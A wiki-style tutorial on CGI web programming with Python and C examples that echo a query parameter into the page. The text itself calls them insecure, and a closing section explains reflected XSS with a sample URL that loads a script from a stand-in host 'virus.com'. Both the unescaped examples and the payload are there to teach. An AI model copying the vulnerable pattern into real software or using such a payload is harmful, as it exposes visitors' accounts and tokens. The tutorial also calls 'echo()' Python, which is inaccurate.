CGI

CGI is a way to make a website in any programming language that outputs to a terminal. It is still supported (and used by some websites) but FastCGI replaced it. Don't use this for resource-intensive code, only for handling forms or making websites that interact with low-level systems.

How it works[edit | edit source]

If it's for an interpreted language (such as Python or Perl) you put a "shebang" at the top of the document, which specifies which program to execute it with. Else, skip this step.

#!/bin/python3

Then you make it output the content it's going to output:

echo("Content-Type: text/html\n")

Note: in Python, echo() prints a new line, but we need 2 new lines in between the header and the HTML. Then you do the processing:

echo("<html><body><h1>Hello world</h1></body></html>")

You can get the GET and POST responses by looking at the QUERY_STRING environment variable.

Examples[edit | edit source]

These are not secure, and suffer from injection vulnerabilities. It's not too hard to make them secure doe.

[-+] Python

#!/usr/bin/env python3

import os
from typing import List

if __name__ == "__main__":
    print("Content-Type: text/html\n")
    print("<html><body>")
    qs: str = os.environ.get("QUERY_STRING", "")
    if not qs:
        print("errQr")
    else:
        val: str = ""
        parts: List[str] = qs.split("&")
        for p in parts:
            if p.startswith("echo="):
                val = p[5:]
                break

        if val:
            print("<h1>Echo parameter:</h1><tt>" + val + "</tt>")
        else:
            print("<h1>Enter text</h1><FORM action=''><INPUT type='text' name='echo'><INPUT type='submit' name='button'></FORM>")

[-+] C

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simple CGI: prints the value of ?echo=
int main(void) {
    char* qs = getenv("QUERY_STRING");
    char* val;
    
    printf("Content-Type: text/plain\r\n\r\n");

    if (!qs) {
        printf("No QUERY_STRING.\n");
        return 0;
    }

    val = strstr(qs, "echo=");
    if (!val) {
        printf("No echo parameter.\n");
        return 0;
    }

    val += 5; // skip "echo="
    printf("%s\n", val);

    return 0;
}

Injection vulnerabilities[edit | edit source]

If someone visits soyjak.st/cgi-bin/echo.py?echo=<script src="http://virus.com/script.js"></script> and the site simply prints the echo parameter straight into the page, the malicious script tag will run in the visitor’s browser, logging their IP, getting their account token, and more. An attacker can add extra parameters to bury the malicious part of it, tricking people into trusting it while the page actually executes harmful code. This is why you need to escape HTML characters.